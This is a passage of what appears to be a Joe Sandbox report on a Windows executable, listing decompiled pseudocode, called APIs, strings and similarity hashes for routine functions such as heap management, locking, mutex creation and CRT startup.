				 *((intOrPtr*)(_t18 + 4)) = 0;
				E01001F6F( &_v532, 0x104, __ecx, __ecx);
				_t35 =  &_v544;
				E01001ED6( &_v544, L"_p0");
				_t44 = OpenSemaphoreW(0x1f0003, 0,  &_v548);
				if(_t44 != 0) {
					_t39 =  &_v544;
					_v544 = 0;
					_t36 = _t44;
					_t31 = E01002A6E(_t44, _t39);
					if(_t31 >= 0) {
						_t35 = _v540;
						asm("cdq");
						 *_t35 = _v544;
						 *((intOrPtr*)(_t35 + 4)) = _t39;
					} else {
						_t35 = _v0;
						_t39 = 0xce;
						E01002906(_t36, _t31);
						_t41 = _t31;
					}
				} else {
					if(GetLastError() != 2) {
						_t35 = _v0;
						_t39 = 0xc8;
						_t41 = E01002925("wil");
					}
				}
				if(_t44 != 0) {
					_push(_t44);
					E01002981(_t31, _t35);
				}
				_pop(_t42);
				_pop(_t45);
				_pop(_t32);
				return E01006160(_t41, _t32, _v12 ^ _t48, _t39, _t42, _t45);
			}

0x01002b91
0x01002b9e
0x01002ba5
0x01002ba8
0x01002bad
0x01002bb0
0x01002bb2
0x01002bb4
0x01002bbd
0x01002bbf
0x01002bc2
0x01002bcc
0x01002bd0
0x01002be6
0x01002bea
0x01002c0d
0x01002c11
0x01002c15
0x01002c1c
0x01002c20
0x01002c35
0x01002c3d
0x01002c3e
0x01002c40
0x01002c22
0x01002c24
0x01002c27
0x01002c2c
0x01002c31
0x01002c31
0x01002bec
0x01002bf5
0x01002bf7
0x01002bfa
0x01002c09
0x01002c09
0x01002bf5
0x01002c45
0x01002c47
0x01002c48
0x01002c48
0x01002c56
0x01002c57
0x01002c58
0x01002c63

APIs

OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 01002BE0
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 01002BEC

Strings

_p0, xrefs: 01002BC7
wil, xrefs: 01002BFF

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: ErrorLastOpenSemaphore
String ID: _p0$wil
API String ID: 1909229842-1814513734
Opcode ID: 2680b91dee11c8508a74057ca0f2f47a3724e3f8616cac007dd6ba670586fa86
Instruction ID: c571f84bd438ad351faf7dbd4fff70e352dce3bf4e9dcb37fdb967597c335382
Opcode Fuzzy Hash: 2680b91dee11c8508a74057ca0f2f47a3724e3f8616cac007dd6ba670586fa86
Instruction Fuzzy Hash: 8B21B0716043069BE326EF59D498DABB7E9EBE8710F10451DF8C9872D0DB30DD0587A2

Uniqueness

Uniqueness Score: -1.00%

Function 010048F3 Relevance: 6.4, APIs: 5, Instructions: 110
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E010048F3(long* __ecx, signed int* __edx, intOrPtr* _a4) {
				intOrPtr _v0;
				int _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				intOrPtr* _v24;
				void* _v32;
				long* _v44;
				void* __ebx;
				unsigned int _t36;
				long* _t38;
				intOrPtr* _t44;
				unsigned int _t49;
				signed int* _t58;
				void* _t59;
				intOrPtr _t61;
				long* _t63;
				signed int _t70;
				long* _t79;
				void* _t81;
				void* _t82;
				long* _t87;
				void* _t88;
				int _t90;
				void* _t91;

				_t63 = __ecx;
				_t58 = __edx;
				_t87 = __ecx;
				 *_a4 = 0;
				_t36 = HeapAlloc(GetProcessHeap(), 8, 0x40);
				_v20 = _t36;
				if(_t36 != 0) {
					_v12 = 0;
					_v8 = 0;
					if((_t36 & 0x00000003) != 0) {
						E0100297B(_t36);
						asm("int3");
						_push(_t63);
						_v44 = _t63;
						_t38 = _t63 + 0x28;
						_push(0);
						_t79 = _v44;
						_v44 = _t38;
						if(_t79 != _t38) {
							_push(_t58);
							_push(_t87);
							do {
								_t59 =  *_t79;
								if(_t59 != 0) {
									do {
										_t88 = _t59;
										_t59 =  *(_t59 + 0x1c);
										E01002D7A(_t88);
										HeapFree(GetProcessHeap(), 0, _t88);
									} while (_t59 != 0);
									_t38 = _v12;
								}
								 *_t79 = 0;
								_t79 =  &(_t79[1]);
							} while (_t79 != _t38);
						}
						return _t38;
					} else {
						_push(0);
						_t81 = E010029CD( &_v12, _t87, _t63, _t36 >> 2);
						if(_t81 >= 0) {
							_t44 = _v24;
							_t90 = 0x30;
							 *_t44 = 1;
							_t82 = _t44 + 0x10;
							 *(_t44 + 4) =  *_t58;
							 *_t58 =  *_t58 & 0x00000000;
							_t61 = 0;
							 *((intOrPtr*)(_t44 + 8)) = _v16;
							 *((intOrPtr*)(_t44 + 0xc)) = _v12;
							_v16 = 0;
							_v20 = 0;
							_v12 = 0;
							memset(_t82, 0, _t90);
							 *_t82 = _t90;
							 *((intOrPtr*)(_t82 + 4)) = 1;
							_t91 = 0;
							_t70 = 0xa;
							memset(_t82 + 8, 0, _t70 << 2);
							_t72 = _a4;
							_t81 = 0;
							 *_a4 = _v24;
							_t49 = _v20;
						} else {
							_t72 = _v0;
							E01002906( &_v12, _t81);
							_t49 = _v20;
							_t61 = _v24;
							_t91 = _v32;
						}
						if(_t49 != 0) {
							_push(_t49);
							E01002981(_t61, _t72);
						}
						if(_t61 != 0) {
							_push(_t61);
							E01002981(_t61, _t72);
						}
						if(_t91 != 0) {
							HeapFree(GetProcessHeap(), 0, _t91);
						}
						goto L12;
					}
				} else {
					_t81 = 0x8007000e;
					E01002906(_t63, 0x8007000e);
					L12:
					return _t81;
				}
			}

0x010048f3
0x01004908
0x0100490c
0x0100490e
0x01004917
0x0100491d
0x01004923
0x0100493e
0x01004942
0x01004948
0x01004a1a
0x01004a1f
0x01004a25
0x01004a26
0x01004a29
0x01004a2c
0x01004a2d
0x01004a30
0x01004a35
0x01004a37
0x01004a38
0x01004a39
0x01004a39
0x01004a3d
0x01004a3f
0x01004a3f
0x01004a41
0x01004a46
0x01004a55
0x01004a5b
0x01004a5f
0x01004a5f
0x01004a62
0x01004a68
0x01004a6b
0x01004a70
0x01004a75
0x0100494e
0x0100494e
0x0100495e
0x01004962
0x01004981
0x01004987
0x01004989
0x0100498f
0x01004994
0x01004997
0x0100499a
0x010049a0
0x010049a7
0x010049ae
0x010049b2
0x010049b6
0x010049ba
0x010049c2
0x010049c5
0x010049d1
0x010049d5
0x010049d6
0x010049d8
0x010049db
0x010049e1
0x010049e3
0x01004964
0x01004966
0x0100496e
0x01004973
0x01004977
0x0100497b
0x0100497b
0x010049e9
0x010049eb
0x010049ec
0x010049ec
0x010049f3
0x010049f5
0x010049f6
0x010049f6
0x010049fd
0x01004a09
0x01004a09
0x00000000
0x010049fd
0x01004925
0x01004925
0x01004934
0x01004a0f
0x01004a17
0x01004a17

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000040,?,00000000,?,?,?,010047C2,?,?,?,?,00000000), ref: 01004910
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,010047C2,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 01004917
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,010047C2,?,?,?,?,00000000), ref: 01004A02
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?,?,010047C2,?,?,?,?,00000000), ref: 01004A09

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: b45f5d83706623e85b36931984ff999e94fa5b1a23d76700ddcdf979d92544de
Instruction ID: aed4570f5e6d697060d3aadb36c1a42f11ec6c634c6dc27c19df2ab18b764336
Opcode Fuzzy Hash: b45f5d83706623e85b36931984ff999e94fa5b1a23d76700ddcdf979d92544de
Instruction Fuzzy Hash: FF319EB16043029FE716DF29C849A5BBBE8EFC9350F04452DFA8897390DB75D805CB66

Uniqueness

Uniqueness Score: -1.00%

Function 01003168 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(01008490), ref: 010031BB
ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(01008490), ref: 010031D1

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID:
API String ID: 17069307-0
Opcode ID: 581ff5d8a4ba0ff3cf72d06bd9566aca2b45b7a86284f56c3a5d2a3c69ed8e02
Instruction ID: 2b5be08b823d2e0496be25cbdb48978c0bd0ad7ff6713b56aa458fb530180231
Opcode Fuzzy Hash: 581ff5d8a4ba0ff3cf72d06bd9566aca2b45b7a86284f56c3a5d2a3c69ed8e02
Instruction Fuzzy Hash: 32214F31B01205AFAB67DF58D88889A77B5FF49225F0580AEE5858F251CB359C40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01003E1D Relevance: 6.1, APIs: 4, Instructions: 56comCOMMON

Download Yara Rule

APIs

CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000006), ref: 01003E39
CLSIDFromString.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 01003E48
CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(?,00000000,00000001,01001914,?,?,?), ref: 01003E63
CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 01003E94

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: CreateFromInitializeInstanceStringUninitialize
String ID:
API String ID: 2575628211-0
Opcode ID: 9ecb69afe19485d0df79eabd9e5a5be95760a7289f1d42c2ee1486ef2d1ffc68
Instruction ID: 1fab837cb70bf8ee8d65c1344aa199ae8737bfcab690660dfe273c47f7cdb6b4
Opcode Fuzzy Hash: 9ecb69afe19485d0df79eabd9e5a5be95760a7289f1d42c2ee1486ef2d1ffc68
Instruction Fuzzy Hash: 03115231700119AFD722DB65D849FAF7B79EF48714F004059FA49D7291DB36AD02CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01005E30 Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01005E30() {
				signed int _t10;
				void* _t15;
				signed int _t18;
				intOrPtr _t19;
				void* _t25;

				_t25 =  *0x1000000 - 0x5a4d; // 0x5a4d
				if(_t25 == 0) {
					_t19 =  *0x100003c; // 0xf0
					__eflags =  *((intOrPtr*)(_t19 + 0x1000000)) - 0x4550;
					if( *((intOrPtr*)(_t19 + 0x1000000)) != 0x4550) {
						goto L1;
					} else {
						_t2 = _t19 + 0x1000018; // 0xc0e010b
						_t18 =  *_t2 & 0x0000ffff;
						__eflags = _t18 - 0x10b;
						if(_t18 == 0x10b) {
							_t10 = 0;
							__eflags =  *((intOrPtr*)(_t19 + 0x1000074)) - 0xe;
							if( *((intOrPtr*)(_t19 + 0x1000074)) > 0xe) {
								__eflags =  *(_t19 + 0x10000e8);
								goto L9;
							}
						} else {
							__eflags = _t18 - 0x20b;
							if(_t18 != 0x20b) {
								goto L1;
							} else {
								_t10 = 0;
								__eflags =  *((intOrPtr*)(_t19 + 0x1000084)) - 0xe;
								if( *((intOrPtr*)(_t19 + 0x1000084)) > 0xe) {
									__eflags =  *(_t19 + 0x10000f8);
									L9:
									_t8 = __eflags != 0;
									__eflags = _t8;
									_t10 = _t10 & 0xffffff00 | _t8;
								}
							}
						}
					}
				} else {
					L1:
					_t10 = 0;
				}
				 *0x1008048 = _t10;
				__set_app_type(E010065FE(2));
				 *0x10084ec =  *0x10084ec | 0xffffffff;
				 *0x10084f0 =  *0x10084f0 | 0xffffffff;
				 *(__p__fmode()) =  *0x1008380;
				 *(__p__commode()) =  *0x1008374;
				_t15 = E01006820();
				if( *0x1008014 == 0) {
					__setusermatherr(E01006820);
				}
				E01006823(_t15);
				return 0;
			}

0x01005e35
0x01005e3c
0x01005e42
0x01005e48
0x01005e52
0x00000000
0x01005e54
0x01005e54
0x01005e54
0x01005e5b
0x01005e60
0x01005e7c
0x01005e7e
0x01005e85
0x01005e87
0x00000000
0x01005e87
0x01005e62
0x01005e62
0x01005e67
0x00000000
0x01005e69
0x01005e69
0x01005e6b
0x01005e72
0x01005e74
0x01005e8d
0x01005e8d
0x01005e8d
0x01005e8d
0x01005e8d
0x01005e72
0x01005e67
0x01005e60
0x01005e3e
0x01005e3e
0x01005e3e
0x01005e3e
0x01005e92
0x01005e9d
0x01005ea3
0x01005eaa
0x01005ebf
0x01005ecd
0x01005ecf
0x01005edb
0x01005ee2
0x01005ee8
0x01005ee9
0x01005ef0

APIs

__set_app_type.MSVCRT ref: 01005E9D
__p__fmode.MSVCRT ref: 01005EB3
__p__commode.MSVCRT ref: 01005EC1
__setusermatherr.MSVCRT ref: 01005EE2

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1063105408-0
Opcode ID: dfb8bc72d2e409e6f0512586c8a21c6a9bd691f060d21ab21ef91e2bcf0ffabc
Instruction ID: 1bc93490a473d3cd18cb1187f2911a66fffc23408a1618e31c910bb750aae399
Opcode Fuzzy Hash: dfb8bc72d2e409e6f0512586c8a21c6a9bd691f060d21ab21ef91e2bcf0ffabc
Instruction Fuzzy Hash: 2E111C70900241CFE77BDF34A84826837A1B704355F64CA6AF1E5C61DADB3B8981CF10

Uniqueness

Uniqueness Score: -1.00%

Function 01004671 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E01004671(void* __ecx, signed int* __edx, void* __edi, void* __eflags) {
				signed int _v0;
				signed int _v8;
				char _v528;
				signed int _v532;
				signed int _v536;
				signed int _v544;
				signed int _v548;
				void* __ebx;
				void* __esi;
				signed int _t35;
				signed int* _t46;
				signed int _t56;
				signed int _t59;
				signed int _t60;

				_t55 = __edi;
				_t54 = __edx;
				_v8 =  *0x1008018 ^ _t60;
				_t46 = __edx;
				 *((intOrPtr*)(__edx)) = 0;
				E01001F2B( &_v528, 0x104, L"Local\\SM0:%d:%d:%hs", GetCurrentProcessId());
				_v532 = 0;
				__imp__CreateMutexExW(0,  &_v528, 0, 0x1f0001, 0x40, __ecx);
				E010045EB( &_v532,  &_v528);
				if(_v532 != 0) {
					_push(__edi);
					E01004A76( &_v532, _t54,  &_v536);
					_v548 = 0;
					_t50 =  &_v528;
					_v544 = 0;
					_t56 = 0;
					_t59 = E01002B89(_t50, __eflags,  &_v548,  &_v532);
					__eflags = _t59;
					if(_t59 >= 0) {
						_t35 = _v548;
						_t59 = 0;
						__eflags = 0;
					} else {
						_push(_t59);
						_push(_t50);
						_t50 = _v0;
						_t54 = 0x61;
						E01002906();
						_t35 = 0;
					}
					__eflags = _t59;
					if(_t59 >= 0) {
						_t56 = _t35 << 2;
						_t59 = 0;
						__eflags = 0;
					} else {
						_push(_t59);
						_push(_t50);
						_t50 = _v0;
						_t54 = 0x6a;
						E01002906();
					}
					__eflags = _t59;
					if(_t59 >= 0) {
						__eflags = _t56;
						if(_t56 == 0) {
							_t54 =  &_v532;
							_t50 =  &_v528;
							_t59 = E010048F3( &_v528,  &_v532, _t46);
							__eflags = _t59;
							if(_t59 >= 0) {
								L12:
								_t59 = 0;
								__eflags = 0;
								goto L13;
							}
							_t54 = 0x129;
							goto L20;
						}
						 *_t46 = _t56;
						_t50 =  *_t56 + 1;
						__eflags = _t50;
						 *( *_t46) = _t50;
						goto L12;
					} else {
						_t54 = 0x121;
						L20:
						_t50 = _v0;
						E01002906(_v0, _t59);
						L13:
						__eflags = _v536;
						_pop(_t55);
						if(_v536 != 0) {
							_push(_v536);
							E010029A8(_t50);
						}
						__eflags = _v532;
						if(_v532 != 0) {
							_push(_v532);
							E01002981(_t46, _t50);
						}
						L17:
						return E01006160(_t59, _t46, _v8 ^ _t60, _t54, _t55, _t59);
					}
				}
				_t59 = E010024CD( &_v532);
				goto L17;
			}

0x01004671
0x01004671
0x01004683
0x01004688
0x0100468f
0x010046a9
0x010046b1
0x010046c5
0x010046d2
0x010046dd
0x010046eb
0x010046fc
0x01004708
0x0100470f
0x01004715
0x0100471b
0x01004722
0x01004724
0x01004726
0x01004739
0x0100473f
0x0100473f
0x01004728
0x01004728
0x01004729
0x0100472a
0x0100472f
0x01004730
0x01004735
0x01004735
0x01004741
0x01004743
0x01004756
0x01004759
0x01004759
0x01004745
0x01004745
0x01004746
0x01004747
0x0100474c
0x0100474d
0x0100474d
0x0100475b
0x0100475d
0x01004766
0x01004768
0x010047b1
0x010047b7
0x010047c2
0x010047c4
0x010047c6
0x01004773
0x01004773
0x01004773
0x00000000
0x01004773
0x010047c8
0x00000000
0x010047c8
0x0100476a
0x01004770
0x01004770
0x01004771
0x00000000
0x0100475f
0x0100475f
0x010047cd
0x010047cf
0x010047d2
0x01004775
0x01004775
0x0100477c
0x0100477d
0x0100477f
0x01004785
0x01004785
0x0100478a
0x01004791
0x01004793
0x01004799
0x01004799
0x0100479e
0x010047af
0x010047af
0x0100475d
0x010046e4
0x00000000

APIs

GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040,?,00000000,00000000), ref: 01004691
CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001,?,?,?,?,?,00000000), ref: 010046C5

Part of subcall function 010045EB: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,?,?,010045CC,00000000,?,?,?,?,01002A3B,?,00000001,?), ref: 010045FB
Part of subcall function 010045EB: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,010045CC,00000000,?,?,?,?,01002A3B,?,00000001,?), ref: 0100460A

Part of subcall function 010048F3: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000040,?,00000000,?,?,?,010047C2,?,?,?,?,00000000), ref: 01004910
Part of subcall function 010048F3: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,010047C2,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 01004917

Strings

Local\SM0:%d:%d:%hs, xrefs: 01004698

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: ErrorHeapLastProcess$AllocCreateCurrentMutex
String ID: Local\SM0:%d:%d:%hs
API String ID: 3112127618-4162240545
Opcode ID: c5e2050449a3de6adf40b6f6458d8dc06071a8c0f34f235e75f30e21b532e626
Instruction ID: 3895ec279b043bcc438d1bb19d5479803303f5b15fe0093f6c5f34b946dc971a
Opcode Fuzzy Hash: c5e2050449a3de6adf40b6f6458d8dc06071a8c0f34f235e75f30e21b532e626
Instruction Fuzzy Hash: 9741B471A4022DABEB33DB64DC88BEA7769BB55750F000195AA4DAB2C0DB705E80CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 01005460 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

RoOriginateError.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80040111,00000000), ref: 01005594

Part of subcall function 01003233: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01008490), ref: 01003264
Part of subcall function 01003233: DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 01003273
Part of subcall function 01003233: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01008490), ref: 01003298

RoOriginateErrorW.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80070057,00000013,?), ref: 010055CA

Strings

pActivatibleClassId, xrefs: 010055B7

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: ErrorLockOriginateShared$AcquireDecodePointerRelease
String ID: pActivatibleClassId
API String ID: 3068322146-955291698
Opcode ID: c5bd456f3fca89ad5f0dfe071d0a7defefacf9a11e554a7c6e9bc6038511ed6b
Instruction ID: 6ad25eeca6e9455ec86eb294959ea17d6c2a6ef1d0b378dfe11f5677fd506348
Opcode Fuzzy Hash: c5bd456f3fca89ad5f0dfe071d0a7defefacf9a11e554a7c6e9bc6038511ed6b
Instruction Fuzzy Hash: 8631C736A01118ABFB22DB54DC54BEE77B6EF04711F114055E986E7281D7379E00CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01002C66 Relevance: 5.1, APIs: 4, Instructions: 106
memoryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E01002C66(void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _t48;
				intOrPtr* _t51;
				intOrPtr* _t54;
				void* _t56;
				void* _t57;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t73;
				void* _t81;
				void* _t82;
				void* _t83;
				long _t86;
				void* _t88;

				_t83 = __edi;
				_t67 = _a4;
				_t88 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = _a8;
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t67 + 4));
				_t48 = __ecx + 0xc;
				 *_t48 = 0;
				_v16 = _t48;
				 *((short*)(__ecx + 0x10)) =  *((intOrPtr*)(_t67 + 0x20));
				 *((intOrPtr*)(__ecx + 0x14)) =  *_t67;
				_t51 = __ecx + 0x1c;
				 *_t51 = 0;
				_v20 = _t51;
				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t67 + 0x48));
				 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(_t67 + 0x4c));
				_t54 = __ecx + 0x28;
				 *_t54 = 0;
				_t70 =  *((intOrPtr*)(_t67 + 0x1c));
				_v24 = _t54;
				_t56 = 1;
				_v8 = 1;
				if(_t70 == 0) {
					L4:
					_t71 =  *((intOrPtr*)(_t67 + 0x44));
					_v12 = _t56;
					if(_t71 == 0) {
						L8:
						_push(_t83);
						_t57 = E010024F0( *((intOrPtr*)(_t67 + 0xc)));
						_t86 = _t57 + _v8 + _v12;
						if( *(_t88 + 0x2c) == 0 ||  *(_t88 + 0x30) < _t86) {
							_t57 = HeapAlloc(GetProcessHeap(), 8, _t86);
							_v12 = _t57;
							if(_t57 != 0) {
								HeapFree(GetProcessHeap(), 0,  *(_t88 + 0x2c));
								_t57 = _v12;
								 *(_t88 + 0x2c) = _t57;
								 *(_t88 + 0x30) = _t86;
							}
						}
						_t73 =  *(_t88 + 0x2c);
						if(_t73 == 0) {
							return _t57;
						} else {
							_t90 = _t73 +  *(_t88 + 0x30);
							return E01004ABE(E01004B3C(E01004B3C(_t73, _t73 +  *(_t88 + 0x30),  *((intOrPtr*)(_t67 + 0x1c)), _v16), _t73 +  *(_t88 + 0x30),  *((intOrPtr*)(_t67 + 0x44)), _v20), _t90,  *((intOrPtr*)(_t67 + 0xc)), _v24);
						}
					}
					_t81 = _t71 + 1;
					do {
						_t64 =  *_t71;
						_t71 = _t71 + 1;
					} while (_t64 != 0);
					_v8 = _t71 - _t81 + 1;
					goto L8;
				}
				_t82 = _t70 + 1;
				do {
					_t66 =  *_t70;
					_t70 = _t70 + 1;
				} while (_t66 != 0);
				_t56 = _t70 - _t82 + 1;
				goto L4;
			}

0x01002c66
0x01002c72
0x01002c76
0x01002c7a
0x01002c80
0x01002c83
0x01002c86
0x01002c88
0x01002c8f
0x01002c95
0x01002c98
0x01002c9b
0x01002c9d
0x01002ca3
0x01002ca9
0x01002cac
0x01002caf
0x01002cb1
0x01002cb4
0x01002cb9
0x01002cba
0x01002cbf
0x01002cd0
0x01002cd0
0x01002cd3
0x01002cd8
0x01002cec
0x01002cef
0x01002cf0
0x01002cfa
0x01002d01
0x01002d12
0x01002d18
0x01002d1d
0x01002d2b
0x01002d31
0x01002d34
0x01002d37
0x01002d37
0x01002d1d
0x01002d3a
0x01002d40
0x01002d77
0x01002d42
0x01002d48
0x00000000
0x01002d6d
0x01002d40
0x01002cda
0x01002cdd
0x01002cdd
0x01002cdf
0x01002ce0
0x01002ce9
0x00000000
0x01002ce9
0x01002cc1
0x01002cc4
0x01002cc4
0x01002cc6
0x01002cc7
0x01002ccd
0x00000000

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?), ref: 01002D0B
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01002D12
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01002D24
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01002D2B

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 080461b1588997124a4aae735525b9e2e940c553c5d24d38b782887b910f7895
Instruction ID: ca8c06f619e364327b57a63b669ddc3b1a96e18660ccf6ebb0eb3526609701d2
Opcode Fuzzy Hash: 080461b1588997124a4aae735525b9e2e940c553c5d24d38b782887b910f7895
Instruction Fuzzy Hash: 03418D75900705DFDB56DF68C4849AABBF5FF48300B1486AEE88AD7746D732E901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01006C10 Relevance: 5.1, APIs: 4, Instructions: 79
memoryCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E01006C10(void* __eax, void* __edx) {
				signed int _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t19;
				long _t28;
				void* _t30;
				void* _t31;
				void* _t32;
				void* _t43;
				intOrPtr* _t44;
				long _t47;
				void* _t48;
				signed int _t52;

				_t41 = __edx;
				_t32 =  *0x1008004;
				if(_t32 != 0) {
					_t50 = _t52;
					_push(_t32);
					_push(_t32);
					_v8 =  *0x1008018 ^ _t52;
					_t30 = _t32;
					_t34 = _t30 + 4;
					E01004A76(_t30 + 4, __edx,  &_v12);
					_t19 =  *_t30 - 1;
					 *_t30 = _t19;
					if(_t19 != 0) {
						_t47 = _v12;
						goto L13;
